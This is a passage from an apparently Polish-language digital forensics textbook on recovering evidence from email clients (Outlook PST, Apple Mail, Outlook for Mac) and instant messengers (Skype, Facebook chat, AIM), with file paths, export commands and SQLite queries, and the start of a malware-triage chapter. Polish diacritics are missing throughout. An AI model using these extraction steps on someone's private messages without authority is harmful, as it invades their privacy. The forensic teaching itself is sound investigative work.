w kilku systemach operacyjnych i przy uyciu kilku rnych kompilatorw. Po zakoczeniu
kompilacji otrzymasz plik pffinfo.exe, za pomoc ktrego moesz wywietli podstawowe
informacje o interesujcym Ci pliku Outlooka. Oto przykad:
$ ./pffinfo.exe Outlook.pst
pffinfo 20120802
Personal Folder File information:

File size: 38617088 bytes
File content type: Personal Storage Tables (PST)
File type: 32-bit
Encryption type: compressible
Message store:
Folders: Subtree, Inbox, Outbox, Wastbox,
Sentmail, Views, Common views, Finder
Password checksum: N/A
Aby wydoby dane z tego pliku PST, naley uy programu pffexport.exe. Ponisze polecenie
powoduje wypakowanie wszystkich dostpnych typw elementw z pliku rdowego Outlook.pst
i utworzenie dziennika o nazwie outlook.pst.log:
$ ./pffexport.exe -m all -l outlook.pst.log Outlook.pst
pffexport 20120802
Opening file.
Recovering items.
Exporting items.
Exporting folder item 1 out of 6.
Exporting email item 1 out of 1099.
Exporting email item 2 out of 1099.
Exporting recipient.
Exporting contact item 105 out of 105.

Export completed.
Domylnie pffexport zapisuje wszystkie wydobyte dane w katalogu o nazwie utworzonej z nazwy
pliku rdowego z dodatkiem przyrostka .export. W katalogu tym znajdziesz kilka podkatalogw.
W zalenoci od protokou i opcji zdefiniowanych przez uytkownika, dane poczty mog znajdowa si
w jednym z kilku folderw. Najszybszym sposobem na znalezienie poczty jest poszukanie folderw
o nazwie Inbox lub plikw o nazwach Message.txt lub Message.rtf, co pokazano na poniszym rysunku.
Program pffexport tworzy po jednym folderze dla kadej pozycji, np. e-maila, i zapisuje w nim
wszystkie zwizane z ni dane, wcznie z treci wiadomoci, nagwkami i zacznikami.
Apple Mail
Program Apple Mail to klient poczty elektronicznej wbudowany w system operacyjny OS X firmy
Apple. Obsuguje protokoy POP, IMAP i Microsoft Exchange. Popularny w systemach OS X,
poniewa jest w nich standardowo dostpny i obsuguje wszystkie najwaniejsze protokoy
pocztowe. Chtnie uywaj go zarwno osoby prywatne, jak i mniejsze oraz rednie organizacje.
W duych przedsibiorstwach te mona spotka Apple Mail, chocia w tych rodowiskach
popularniejszy wydaje si Microsoft Outlook dla komputerw Mac jeszcze do niego wrcimy.

Program Apple Mail przechowuje dane wszystkich uytkownikw w jednym katalogu
/Users/{profile}/Library/Mail. Nowe wersje tego programu tworz nowy katalog dla kadego
utworzonego konta w katalogu V2. Przykadowo dane konta IMAP o nazwie bartek@example.com
zostayby umieszczone w katalogu /Users/{profil}/Library/Mail/V2/IMAP-bob@example.com.
Struktura folderw tego katalogu odpowiada strukturze konta IMAP Bartka. Jeli przyjrzysz si jej
dokadnie, zauwaysz, e kady folder zawiera dodatkowe podfoldery na drodze do rzeczywistych
plikw wiadomoci. Przykadowo pena cieka do pliku wiadomoci e-mail moe wyglda
tak: /Users/{profil}/Library/Mail/V2/IMAP-bartek@example.com/INBOX.mbox/
25892e17-80f6-415f-9c65-7395632f0223/Data/Messages/1.emlx.
Format danych
Wiadomoci e-mail w programie Apple Mail od wersji 2. s zapisywane w formacie tekstowym
emlx. Mona wic je przeglda i przeszukiwa za pomoc dowolnego narzdzia sucego
do przegldania plikw tekstowych.
Narzdzia
Jako e wiadomoci e-mail w programie Apple Mail s przechowywane w postaci tekstu, do ich
analizy mona wykorzysta wiele rnych narzdzi. Czasami do znalezienia informacji wystarcz
najprostsze programy dziaajce w wierszu polece, takie jak grep czy strings. Bardzo skuteczne s
te bardziej kompleksowe rozwizania z graficznym interfejsem uytkownika, takie jak PowerGREP.
Ewentualnie mona przekonwertowa format emlx na standardowy mbox, a nastpnie przejrze
wiadomoci w darmowym kliencie poczty, takim jak Mozilla Thunderbird.
W INTERNECIE
PowerGREP www.powergrep.com
Emlx to Mbox Converter www.cosmicsoft.net/emlxconvert.html
Mozilla Thunderbird www.mozilla.org/en-US/thunderbird
Komercyjne narzdzia, takie jak EnCase, maj wbudowane funkcje umoliwiajce

prezentowanie danych poczty elektronicznej w atwym do przegldania formacie drzewiastym.
Microsoft Outlook for Mac

Program Microsoft Outlook wchodzi te w skad pakietu Office for Mac Home & Business Edition.
W wersji tej mona znale wikszo funkcji i interfejs podobny do wersji dla systemu Windows.
Poza tym program Outlook ma funkcje podobne do programu Apple Mail, tylko Outlook for Mac
dodatkowo umoliwia tworzenie serwerowych regu Exchange i integracj z innymi usugami
dla przedsibiorstw Exchange i oglnie firmy Microsoft, np. Lync. Dlatego wanie Outlook for
Mac jest popularniejszy w duych przedsibiorstwach w maych firmach i u indywidualnych
uytkownikw raczej go nie spotykamy.
Miejsce przechowywania i format danych

Program Microsoft Outlook for Mac 2011 przechowuje dane uytkownika w katalogu
/Users/{profil}/Documents/Microsoft User Data/Office 2011 Identities. Domylnie istnieje tylko
jedna tosamo (ang. identity) o nazwie Main Identity, ktra znajduje si w katalogu Identities.
Uytkownicy mog zarzdza tosamociami za pomoc programu Microsoft Database Utility,
ktry jest instalowany wraz z pakietem Office for Mac Home & Business. Kada tosamo moe
posiada dowoln liczb kont e-mail. Wszystkie ustawienia i dane tosamoci s przechowywane
w katalogach umieszczonych w odpowiednim katalogu tosamoci.
Tosamoci i wszystkie dotyczce ich dane s zapisywane w specjalnej bazie danych utworzonej
przez firm Microsoft. Plik tej bazy nazywa si Database i jest przechowywany w katalogu
Identities. W starym kliencie poczty elektronicznej dla komputerw Mac firmy Microsoft o nazwie
Entourage w pliku Database przechowywana bya wikszo danych uytkownika, wcznie
z wiadomociami i inn treci. Powodowao to problemy z wydajnoci, wic opracowano now
metod przechowywania treci.
W katalogu Identities dodano nowy katalog o nazwie Data Records, w ktrym program Outlook
przechowuje tre podzielon na pliki i katalogi. Katalog Data Records zawiera po jednym podkatalogu
dla kadego gwnego typu treci, np. Message Source, Contacts i Categories. W kadym katalogu
treci dane s przechowywane w podkatalogach w taki sposb, e jeden podkatalog moe zawiera
maksymalnie 1000 plikw. Nazwy folderom nadawane s wg wzoru nT/nB/nM/nK, gdzie n oznacza
kolejne liczby, a litery T, B, M i K oznaczaj odpowiednio bilion, miliard, milion i tysic. Wedug tego
schematu pliki treci znajduj si tylko w katalogach nK. Kady plik ma rozszerzenie olk14{typtreci},
przy czym typtreci to acuch typu Schedule, Message, MsgSource lub Recent.
Tre wiadomoci e-mail znajduje si w katalogu Message Source w podkatalogu Data Records.
Pliki maj rozszerzenie olk14MsgSource i s w firmowym formacie, w ktrym wiadomo jest
przechowywana w postaci tekstu ASCII, Unicode lub jednej i drugiej.
Narzdzia
Metody przechowywania danych przez program Outlook for Mac troch utrudniaj ich analiz
bez solidnych narzdzi. Wprawdzie mona posuy si standardowymi edytorami tekstu, takimi
jak grep i strings, ale trzeba uwaa na potencjalne znaki Unicode. Najlepiej skorzysta z jakiego
narzdzia przeznaczonego specjalnie do pracy z programem Outlook for Mac 2011, np. Aid4Mail
lub Emailchemy. Nie wszystkie narzdzia dobrze obsuguj Unicode i nawet jeli tylko standardowe
znaki ASCII bd zapisane przy uyciu tego kodowania, mog wystpi problemy.
KOMUNIKATORY INTERNETOWE
Klienty wiadomoci byskawicznych (ang. instant message IM) zwane potocznie komunikatorami
internetowymi umoliwiaj komunikacj na bieco. Moe to by zarwno komunikacja dwustronna,
jak i wielostronna sesja. Komunikatory znacznie si rozwiny w porwnaniu z pierwszymi wersjami
i obecnie umoliwiaj przesyanie plikw, prowadzenie rozmw gosowych i konferencji wideo,
rozmawianie z uytkownikami telefonw, a nawet nagrywanie i zapisywanie poczty gosowej.
W odrnieniu od komunikacji e-mail, uczestnicy tej formy porozumiewania si mog sprawdzi,
czy rozmwca jest zalogowany, czy jest w pobliu komputera itd.
Istnieje wiele komunikatorw internetowych, wic uytkownicy maj z czego wybiera. Wikszo
osb w wyborze programu kieruje si dostpnoci wybranych funkcji, tym, czy jest on atwy w obsudze,
znajomoci producenta, bezpieczestwem albo po prostu osobistymi preferencjami. Klienci cigle
daj nowych funkcji, bezpieczestwa i niezawodnoci, co przyczynia si do tego, e aplikacje te
nieustannie si zmieniaj. W efekcie nie moemy opisa wszystkich wersji kadego programu w tej
ksice. Dlatego przedstawiamy tylko ogln technik analizy i rodowiska testowe oraz podajemy
przykady odnoszce si do kilku najpopularniejszych komunikatorw internetowych.
Metody analizy
Czste aktualizacje komunikatorw internetowych sprawiaj, e kady trzeba dokadnie przetestowa,
aby upewni si, e wyniki otrzymywane przez jedno narzdzie s spjne z wynikami zwracanymi
przez inne. Najlepiej dokadnie opisa metod testowania i cile si jej trzyma. W ten sposb
zwikszysz szanse na to, e nie wycigniesz nieprawidowych wnioskw na podstawie analizy
danych komunikatora.
1. rodowisko testowe najlepsze rodowisko testowe powinno skada si z tej samej wersji
systemu operacyjnego i komunikatora jak bdce przedmiotem ledztwa. Nie zawsze jest to
moliwe i jeli nie uda si speni tego warunku, naley zastanowi si, na ile otrzymane
wyniki s wiarygodne. Jak napisalimy wczeniej, najlepiej zainstalowa wie kopi
systemu operacyjnego, moe by w maszynie wirtualnej, aby wyeliminowa zakcenia
spowodowane przez niepotrzebne aplikacje.
2. Technologia komunikacji wikszo komunikatorw internetowych dziaa na bazie
podobnej technologii, ktra decyduje o sposobie przesyania i przechowywania danych.
Znajomo tych protokow i jzykw pomaga w zrozumieniu zmian pojawiajcych si
w rodowisku testowym oraz wykrywaniu wiadomoci w pliku stronicowania, pamici lub
nieprzydzielonej przestrzeni w urzdzeniu. Oto kilka przykadw czsto wykorzystywanych
technologii.
a) HTML jzyk HTML jest powszechnie wykorzystywany do tworzenia stron
internetowych. W formacie tym tekst jest osadzony w specjalnych elementach jzyka,
ktre okrelaj krj pisma, kolory, obrazy itd. W formacie HTML zapisuje swoje
dzienniki komunikator AIM (ang. AOL Instant Messenger), pod warunkiem e ma
wczon funkcj zapisywania dziennikw.
b) XML jzyk XML z zaoenia mia by czytelny zarwno dla czowieka, jak i maszyny
dziki wykorzystaniu dowolnych znacznikw definiowanych przez projektanta aplikacji.
Dzienniki w formie dokumentw XML tworzy program Windows Messenger.
c) SQLite jest to relacyjna baza danych o otwartym kodzie rdowym suca do
przechowywania tekstu i danych binarnych. W bazach tego typu dane przechowuje
wiele aplikacji Mozilli.
d) SOAP protok SOAP (ang. Simple Object Access Protocol) suy do przesyania
danych za pomoc rnych protokow i formatu XML przy jednoczesnym zachowaniu
uporzdkowanej struktury. Artefakty Yahoo! i Gmail czsto s dokumentami XML
w opakowaniu SOAP.
Najpopularniejsze komunikatory i protokoy

Jak napisalimy wczeniej, istnieje wiele komunikatorw internetowych, o wiele za duo,
aby opisa je wszystkie. Dlatego w tym miejscu przedstawiamy przegld niektrych najczciej
uywanych protokow i najpopularniejszych klientw. Komunikatory rni si sposobem
przechowywania i przesyania informacji oraz funkcjonalnoci. Tam, gdzie uznalimy, e jest to
uzasadnione, podajemy wersj klienta, o ktrym piszemy. Jest to konieczne, poniewa programy te
cay czas bardzo si zmieniaj.
Skype
Na pocztku Skype by niezalenym klientem VoIP (ang. Voice over IP). Jego twrcami s
programici, ktrzy kiedy utworzyli program Kazaa do bezporedniej wymiany plikw przez
internet. W 2011 roku firma Microsoft odkupia t technologi i przesza z Windows Live
Messengera na Skypea. Aplikacja ta do komunikacji wykorzystuje poczenie protokow
klient-serwer i peer-to-peer.
Skype umoliwia wykonywanie pocze VoIP, organizowanie rozmw wideo i telekonferencji,
przesyanie plikw oraz prowadzenie prywatnych i grupowych rozmw. Podstawowa funkcja
rozmowy w trybie tekstowym i gosowym z innymi uytkownikami tego programu jest darmowa.
Natomiast poczenia z telefonami stacjonarnymi i komrkowymi s patne, a wysoko opat
zaley od tego, skd i gdzie si dzwoni.
W INTERNECIE
www.skype.com
Miejsce przechowywania dziennikw

Program Skype przechowuje dzienniki w profilu uytkownika. Ich zapisywanie jest domylnie
wczone i ustawione na zbieranie caej historii. cieki do dziennikw zale od systemu
operacyjnego i zostay wymienione w tabeli na nastpnej stronie.

Windows Vista i 7 C:\Users\{profil_Windows}\AppData\Roaming\Skype\{profil_Skype}\
Windows 2000 i XP C:\Documents and Settings\Application Data\Local\Skype\{profil_Skype}\
Linux /home/{profil_Linux}/.Skype/{profil_Skype}/
OS X /Users/{uytkownik}/Library/Application Support/Skype/{profil_Skype}/
Format dziennikw
Dzienniki rozmw s prowadzone w formie bazy danych SQLite3 o nazwie main.db. Plik ten
zawiera tabele, w ktrych znajduje si zapis konwersacji. Baz t mona otworzy za pomoc
przegldarki plikw SQLite. Wiadomoci tekstowe znajduj si w tabeli Messages. Format
wiadomoci w bazie danych zaczyna si od nazwy profilu Skype w systemie, nastpnie znajduje si
symbol oddzielajcy (/$) i nazwa Skype rozmwcy, np.:
suspect/$chat.dialog.partner
Jeli obaj uczestnicy komunikacji s znani, mona t informacj wykorzysta w celu poszukania
dodatkowych wiadomoci w pliku stronicowania, pamici i nieprzydzielonych obszarach w urzdzeniu.
Za pomoc przegldarki baz danych SQLite, np. SQLiteSpy, mona odczyta plik main.db
i przeszuka jego zawarto przy uyciu instrukcji SQL. Ponisze proste zapytanie powoduje
wywietlenie wszystkich wiadomoci zapisanych w bazie danych:
SELECT * FROM Messages;
W INTERNECIE
www.yunqa.de/delphi/doku.php/products/sqlitespy/index
Wrd pl w tej tabeli znajduj si pola body_xml, author i timestamps. Pole timestamps
zawiera znaczniki czasu w formacie epoki Uniksa UTC.
Artefakty
Skype przechowuje dodatkowe artefakty w pliku main.db. Mona je wszystkie obejrze
w przegldarce baz danych SQLite3. Wrd tych danych znajduj si rozmowy, grupy, kontakty
i wiadomoci poczty gosowej. Dla Skypea w wersji 6.3.60.105 przegldarka baz danych SQLite3
wywietlia nastpujce tabele (patrz rysunek na nastpnej stronie).
Artefakty poczty gosowej znajdujce si w pliku main.db przedstawiaj ciek do poczty
gosowej przechowywanej w formie pliku DAT. Jest to plik audio wykorzystujcy specjalny kodek
nalecy do Skypea. Za pomoc wasnej instalacji programu Skype mona odtworzy nagrania
poczty gosowej z innych systemw, postpujc w nastpujcy sposb.
1. Utwrz poczt gosow w programie Skype w swoim systemie i znajd plik DAT w profilu.
2. Zamie ten plik na plik DAT zdobyty w toku ledztwa.
3. Odtwrz poczt gosow w swoim programie Skype za pomoc przeznaczonych do tego opcji.
Preferencje
W programie Skype preferencje s przechowywane gwnie w pliku XML o nazwie config.xml
w katalogu profilu uytkownika. Pamitaj, e kady katalog profilu uytkownika moe zawiera
taki plik, tzn. w jednym komputerze moe znajdowa si wiele plikw config.xml. Niektre
pola XML maj etykiety w jzyku angielskim. Kontakty profilu Skype s np. przechowywane
w nastpujcej strukturze:
<CentralStorage>
<SyncSet>
<u>
Kady kontakt jest zapisany w osobnym znaczniku. Jeeli np. nazwa profilu kontaktu
to skype.user, jego dane znajdowayby si w nastpujcym znaczniku:
<skype.user></skype.user>
Jeli uytkownik wczy funkcj zapisywania rozmw tekstowych, liczb dni przechowywania
tych archiww mona znale w nastpujcym znaczniku:
<chat>
<HistoryDays>x</HistoryDays>
</chat>
Naley wiedzie, e liczba dni przechowywania archiwum rozmw bdzie okrelona nawet
wtedy, gdy funkcja archiwizacji rozmw bdzie wyczona. Dlatego naley sprawdzi stan tej
funkcji w poniszym znaczniku:
<Message>
<DisableHistory>1</DisableHistory>
</Message>
Warto 1 oznacza, e funkcja jest wyczona i warto w znaczniku HistoryDays jest ignorowana.
Oto kilka innych znacznikw, ktre mog zawiera cenne informacje:
<UI>
<C>
<Devices>
<General>
<AvatarPath>
<FiletransferDir>
<LastDialedNumbers2>
<SkypeHomeLastRead>
<AvatarPath>
<TransferSaveDir>
Narzdzia
Jest wiele narzdzi do analizowania danych historycznych z programu Skype. Ewentualnie mona
te przeglda plik main.db za pomoc przegldarki baz danych SQLite3 oraz wykonywa zwyke
polecenia SQL na tej bazie danych w celu przeszukania danych i znalezienia artefaktw. Plik
konfiguracji XML mona otworzy w kadym edytorze tekstu i w kadej przegldarce internetowej.
Poniej znajduje si lista niektrych patnych narzdzi do analizowania danych historycznych
programu Skype.
W INTERNECIE
SkypeAlyzer www.sandersonforensics.com
Skype Analyzer home.belkasoft.com/en/bsa/en/Skype_Analyzer.asp
Skype Log View www.nirsoft.net/utils/skype_log_view.html
SkypeParser redwolfcomputerforensics.com/index.php?option=com_content&task=view&id=42&Itemid=55
Chat na Facebooku
W portalu spoecznociowym Facebook znajduje si wbudowany chat z obsug rozmw
tekstowych i wideo. Za jego pomoc uytkownicy mog rozmawia ze wszystkimi osobami spord
swoich znajomych, ktre maj wczon t funkcj. Klient ten zapisuje dane domylnie na serwerze
w profilu na Facebooku. Jeli w chwili wysania wiadomoci adresat jest niedostpny, zostaje ona
zapisana w skrzynce odbiorczej. Zatem wszystkie rozmowy odbywaj si za porednictwem klienta
internetowego nie instaluje si adnych dodatkowych programw na komputerze. Stanowi to
duy problem, jeli ledczy nie ma dostpu do konta uytkownika na Facebooku uzyskanego
na mocy nakazu przeszukania lub innymi rodkami prawnymi.

Facebook nie zapisuje dziennikw w systemie uytkownika. Jest to portal internetowy, wic zapisy
wszystkich rozmw przechowuje na serwerach. Gdy klient jest aktywny, wiadomoci mona
skopiowa z jego okna w normalny sposb. W przeciwnym razie mona poszuka ladw sesji
w pamici, plikach stronicowania, plikach hibernacji, przestrzeni nieprzydzielonej i pamici

podrcznej przegldarek. Wszystkie te artefakty zdobywa si w sposb niebezporedni i nie s one
zapisywane w sposb zaplanowany przez twrc aplikacji. Dlatego te nie mona przewidzie,
czy bd w ogle dostpne ani czy bd kompletne i dokadne.
Format dziennikw
Wiadomoci przesyane przez chat Facebooka w pamici s w formacie JSON. Wysana wiadomo
jest reprezentowana przez znacznik msg z nastpujcymi polami:
text (zawiera tre wiadomoci),
messageID,
time (czas wysania wiadomoci w UTC i w postaci milisekundowanego uniksowego
znacznika czasu),
from (identyfikator Facebooka nadawcy),
to (identyfikator Facebooka adresata),
from_name (zwyky tekst),
to_name (zwyky tekst),
sender_offline (ma warto false, jeli partner rozmowy by w internecie, gdy wysyano
do niego wiadomo).
Poniej znajduje si przykadowa wiadomo (identyfikatory Facebooka zostay zasonite
literami x):
{"msg":{"text":"Jaka rozmowa na chacie",
"messageId":"mid.13674559xxxxx:df1f767dba525b7d49","time":1367418992627,
"clientTime":1367418992627,"msgID":"13674559xxxxx:2710102545",
"offline_threading_id":null},"from":1000057544xxxxx,"id":15519xxxxx,
"to":15519xxxxx,"from_name":"Author_Writer","from_first_name":"Author",
"to_name":"Recipient_Receiver","to_first_name":"Recipient",
"tab_type":"friend","sender_offline":false,"show_orca_callout":false
,"window_id":"35525xxxxx","type":"msg"
}
Jest mao prawdopodobne, e uda si znale wiadomoci z chatu na Facebooku w plikach

pamici podrcznej przegldarki internetowej. Najwiksze szanse ich znalezienia s w pamici
gwnej komputera. Jest przynajmniej jedno narzdzie, Internet Evidence Finder (IEF), ktre
potrafi wydoby z obrazw pamici fragmenty takich rozmw. Ponadto mona sprbowa
poszuka elementw formatu JSON tych wiadomoci, np.:
{"msg":,
{"text":,
"from":,
"id":.
Zwaszcza dwa ostatnie fragmenty s cenne, jeli znany jest facebookowy identyfikator nadawcy
i adresata. Kada wysana lub odebrana wiadomo jest opakowana w znaczniki, co znacznie
utrudnia prac, jeli obraz zawiera duo wiadomoci.
Artefakty
Artefakty Facebooka mog pozostawa w plikach pamici podrcznej przegldarki internetowej,
pliku stronicowania, pamici gwnej oraz nieprzydzielonych obszarach. Facebook dziaajcy
w przegldarce internetowej sam w sobie nie zapisuje adnych dziennikw ani preferencji
w komputerze uytkownika.
Narzdzia
Jako e Facebook nie zapisuje dziennikw w systemie uytkownika, istnieje bardzo niewiele
patnych narzdzi do analizy danych z chatu tego portalu. Jednym z nielicznych, ktre potrafi
przetwarza wiadomoci z chatu i wiele innych dowodw, jest Internet Evidence Findes (IEF).
Program ten przeszukuje obraz pamici pod ktem wystpowania w nim elementw rozmw,
szukajc wszystkich pl JSON wymienionych wczeniej.
W INTERNECIE
www.magnetforensics.com
America Online Instant Messenger (AIM)

Komunikator AOL Instant Messenger (AIM) istnieje jako samodzielny klient chatu od 1997 roku.
Wykorzystuje protok AOL o nazwie Open System for Communication in Real-time (OSCAR).
Cho liczba uytkownikw korzystajcych z tego programu ostatnio zmalaa, nadal jest to bardzo
popularny komunikator internetowy. Niektre z jego funkcji to chat, chat grupowy, chat wideo,
przesyanie plikw oraz wysyanie SMS-w od wersji 8.0.1.5. Ponadto klient ten umoliwia
bezporedni komunikacj z Facebookiem, Twitterem, Google Talk i Instagramem.
W INTERNECIE
www.aim.com

W wersji AIM 8.0.1.5 zaprzestano domylnego zapisywania dziennikw wiadomoci w komputerze
uytkownika. Aby uzyska te rejestry, naley przej odpowiednie procedury prawne. Jednak
uytkownik ma moliwo wczenia lokalnego zapisywania danych za pomoc opcji Save a copy
of my chats on this computer (zapisuj kopie moich rozmw na tym komputerze) znajdujcej si
w menu AIM Preferences/Privacy (preferencje AIM/prywatno).
Jeeli uytkownik tak ustawi program AIM, aby zapisywa dzienniki w jego komputerze, bdzie
mona je znale w folderze Dokumenty w jego profilu. Przykadowo w systemie Windows 7 cieka
do tego katalogu bdzie wygldaa tak: C:\Users\{Profil_Windows}\Documents\AIM Logs\{Profil_AIM}\.
W folderze tym pliki dziennika s przechowywane w podfolderze o nazwie odpowiadajcej loginowi
uytkownika. Ich nazwy zawieraj nazw rozmwcy i rodzaj uytej usugi, np.:
user@gmail.com.gchat.html,
-1111111111@chat.facebook.com.html.
Format dziennikw
Dzienniki programu AIM s zapisywane w formacie HTML, a zawarte w nich wiadomoci znajduj si
w znacznikach <tr>. Kada wiadomo zajmuje osobny wiersz zawierajcy uniksowy znacznik czasu
UTC, pole okrelajce czas lokalny oraz pole z treci waciw wiadomoci. Oto przykad takiej definicji:
<tr><td class="local">Author (16:11:42):</td>
<td class="msg" width="100%">Cze.</td></tr>
W definicji tej wyrniamy nastpujce pola:

ts uniksowy znacznik czasu UTC,
"local" lokalny lub zdalny autor, ktry wysa wiadomo, oraz znacznik czasu
okrelajcy czas lokalny,
"msg" tre waciwa wiadomoci.
Artefakty
Od AIM 8.0.1.5 program nie jest ju instalowany w folderze Program Files. Nowym domylnym
katalogiem instalacyjnym jest folder znajdujcy si w profilu uytkownika, czyli najczciej C:\Users\
{Profil_Windows}\AppData\Local\AIM. Mona to sprawdzi w kluczu rejestru HKCU\Software\
Microsoft\Windows\CurrentVersion\Uninstall\AIM\InstallLocation, co pokazano na poniszym rysunku.
Preferencje
Wikszo preferencji uytkownika w wersji AIM 8 jest przechowywana na serwerze. Ustawienia te
s przekazywane z jednej lokalnej instalacji do nastpnej i zapisywane w lokalnej bazie danych SQLite,
do ktrej cieki podane s w poniszej tabeli.

Windows Vista C:\Users\{profil}\AppData\AOL\AIM\cache\Local Storage\
http_www.aim.com_0.localstorage
Windows 2000 i XP C:\Documents and Settings\{Profil_Windows}\Local Settings\
Application Data\AOL\AIM\cache\Local Storage\
http_www.aim.com_0.localstorage
OS X /Users/{profil}/Library/Application Support/AOL/AIM/cache/Local Storage
Baza danych SQLite zawiera jedn tabel o nazwie ItemTable, w ktrej znajduj si proste
pary klucz-warto suce do lokalnego przechowywania preferencji. Jeli wczona jest funkcja
zapisywania dziennikw w komputerze lokalnym, baza ta zawiera take histori rozmw tekstowych.
Poniej znajduje si przykadowy zapis sesji, w ktrej za pomoc polecenia sqlite3 w Cygwinie
wywietlilimy schemat bazy danych (polecenie .schema), a nastpnie wywietlilimy wszystkie
rekordy za pomoc polecenia select * from ItemTable.
$ sqlite3 http_www.aim.com_0.localstorage
SQLite version 3.8.2 2013-12-06 14:53:30
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE ItemTable (key TEXT UNIQUE ON CONFLICT REPLACE,
value BLOB NOT NULL ON CONFLICT FAIL);
sqlite> select * from ItemTable;
window-dimension-main|{"x":107,"y":112,"width":750,"height":595}
rememberPassword|0
_aim_session-on-www.aim.com-80-auth-current-userData|{"userName":"bad.guy.2"}
_aim_session-on-www.aim.com-80-auth-current-userName|null
_aim_session-on-www.aim.com-80-auth-hostTimeDelta|85
container-mainpanel-width|240
window-dimension-AIM Preferences|{"x":122,"y":69,"width":720,"height":700}
bad.guy.2local-logging|true
chatlog.bad.guy.2.bad.guy.1.0|{"startDate":1387315093,
"endDate":1387315093,"messages":[{"sender":"bad.guy.2",
"msgId":"52b0bf95-0007-00052c-77a355","date":1387315093,
"message":"<div><span style=\"font-family: arial\">hey dude</span></div>"}]}
chatlog.bad.guy.2.bad.guy.1.info|{"firstIndex":0,"lastIndex":0}
chatlog.largest_chatlogs|{"chats":[{"sessionAimId":"bad.guy.2",
"chatAimId":"bad.guy.1","chunkCount":1}]}
sqlite>
Narzdzia
Jako e dzienniki programu AIM s w formacie HTML, do ich przegldania mona uy
dowolnego edytora tekstu. Wyszukujc znaczniki, w ktrych zapisywane s wiadomoci
(np. --><td class="local">), mona znale tekst przesyanych komunikatw w obrazach
pamici, plikach stronicowania oraz przestrzeni nieprzydzielonej. Zawarto bazy danych
preferencji mona wywietli w kadym narzdziu do otwierania baz danych SQLite. Dodatkowo
bardzo przydatne jest windowsowe narzdzie do konwersji czasu o nazwie DCode, ktre uatwia
prac z formatami czasu nieczytelnymi dla czowieka.
W INTERNECIE
www.digital-detective.co.uk/freetools/decode.asp
I CO Z TEGO
Artefakty pozostawiane przez system operacyjny stanowi tylko cz materiau dowodowego
potrzebnego podczas ledztwa. Druga cz, ktra pozwala caociowo zrozumie, co si wydarzyo,
to lady rnych aplikacji, ktre czasami mog by te jedynym dostpnym materiaem dowodowym.
W kadym razie naley pamita, e system operacyjny moe pozostawia tropy aplikacji w nietypowych
miejscach, takich jak wolna przestrze w pliku stronicowania systemu Windows, ktre pozostaj
poza kontrol aplikacji.
W rozdziale tym opisalimy trzy najwaniejsze kategorie aplikacji, w ktrych znajdujemy rne
dowody, czyli przegldarki internetowe, klienty poczty elektronicznej i komunikatory internetowe.
Ponadto napisalimy kilka sw na temat innych programw, dziki ktrym kilka razy udao nam si
zdoby cenne informacje. Poniewa nie moemy opisa wszystkich popularnych aplikacji, musisz
samodzielnie pozna te, ktrych uywa si w Twojej organizacji. Zbierz informacje w formie
podobnej do przedstawionej w tym rozdziale, czyli wypisz miejsca przechowywania danych,
formaty danych oraz narzdzia do ich analizy. Jeli wiedz t poczysz z technikami analitycznymi
opisanymi do tej pory, zdobdziesz wyposaenie, ktre pozwoli Ci rozwiza niejedn spraw!
PYTANIA
1. W trakcie ledztwa administrator baz danych odkrywa, e na jednej stacji roboczej kto
wykona kilkaset zapyta SQL o dugim czasie wykonywania. Samo zapytanie nie zostao
zarejestrowane, ale jest data, godzina, rdo i czas wykonywania. Twoim zadaniem jest
dowiedzenie si, jakie to byo zapytanie. Co zrobisz?
2. Rozpoczynasz ledztwo w komputerze z systemem Windows 7 i odkrywasz, e nie ma w nim
katalogu C:\Users. Zakadasz, e dane nie zostay usunite. Znajd realistyczne wyjanienie
nieobecnoci tego katalogu i opisz sposb dostania si do danych uytkownikw.
3. Prowadzisz ledztwo w systemie Windows XP i natrafiasz na lady systemowe wskazujce

na to, e haker wielokrotnie wykona plik heidisql.exe. Przy zaoeniu, e jest to oryginalna
nazwa programu, co to Twoim zdaniem za aplikacja? Jakie klucze rejestru sprawdzisz,
aby dowiedzie si czego wicej o poczynaniach hakera?
4. Sprawdzasz, jakie artefakty pozostawia pewna aplikacja w systemie Windows 8.
Dowiadujesz si, e zapisuje ona informacje w rnych podkatalogach katalogu AppData:
Local, LocalLow i Roaming. Po co program miaby to robi? Do czego su te podkatalogi?
ROZDZIA 15.
Sortowanie
szkodliwych
programw
P
odczas ledztw czsto znajdujemy w komputerach szkodliwe oprogramowanie (ang. malware).
Wiele osb nazywa tak kady program, ktry haker wykorzystuje do swoich celw, take
wszelkie oglnodostpne narzdzia. Nie jest to jednak dobry pomys, poniewa pojcie
szkodliwe oprogramowanie jest zbyt oglne. Dlatego zawsze staramy si przypisa wykryte
programy do bardziej konkretnych kategorii na podstawie tego, co robi. Posugujemy si wic
takimi terminami jak backdoor (tylne drzwi), program do zrzucania skrtw hase (ang. password
hash dumper), eskalator uprawnie (ang. privilege escalator) czy przekierowywacz portw
(ang. port redirector). Skategoryzowanie i zaszufladkowanie poszczeglnych programw
wykorzystywanych przez hakera uatwia zrozumienie jego zamiarw. Bez tego samo pojcie
szkodliwe oprogramowanie niewiele znaczy.
Nietrudno wic si domyli, e jednym z pierwszych pyta, jakie sobie zadajemy, gdy
znajdziemy szkodliwy program, jest: Co ta aplikacja robi?. Nie znajc odpowiedzi na to pytanie,
trudno przypisa program do odpowiedniej kategorii i domyli si, co haker prbuje osign.
W rozdziale tym opisujemy podstawowe metody sortowania szkodliwych programw, ktrych
zastosowanie pomaga znale odpowied na postawione wczeniej pytanie. Opisujemy sposoby
obchodzenia si ze szkodliwym programem, metody tworzenia rodowiska do sortowania oraz
techniki analizy statycznej i dynamicznej. Nie opisujemy natomiast metod dogbnego analizowania
szkodliwych programw, poniewa s inne doskonae pozycje na ten temat, np. Practical Malware
Analysis (No Starch Press 2012). Zamiast tego koncentrujemy si na tym, co umoliwia szybkie
znajdowanie odpowiedzi na pytania stawiane podczas reakcji na incydent.
Pamitaj, e Twj zesp powinien zdefiniowa cele analityczne dla kadego badanego pliku.
Zebrany materia dowodowy ma umoliwia podjcie konkretnych dziaa. W przeciwnym razie
po prostu zostanie zmarnowany czas. Wyniki mog pomc w wygenerowaniu wskanikw
zagroenia, za pomoc ktrych mona bdzie przeszuka wiksz liczb systemw. W innych
przypadkach zesp RI moe dowiedzie si czego na temat stosowanych przez hakera metod lub
kierujcych nim motyww. Jeli po zakoczeniu analizy nie ma adnych danych pozwalajcych
podj dziaania zaradcze, naley zastanowi si nad sposobem jej przeprowadzenia i czy w ogle
bya potrzebna.
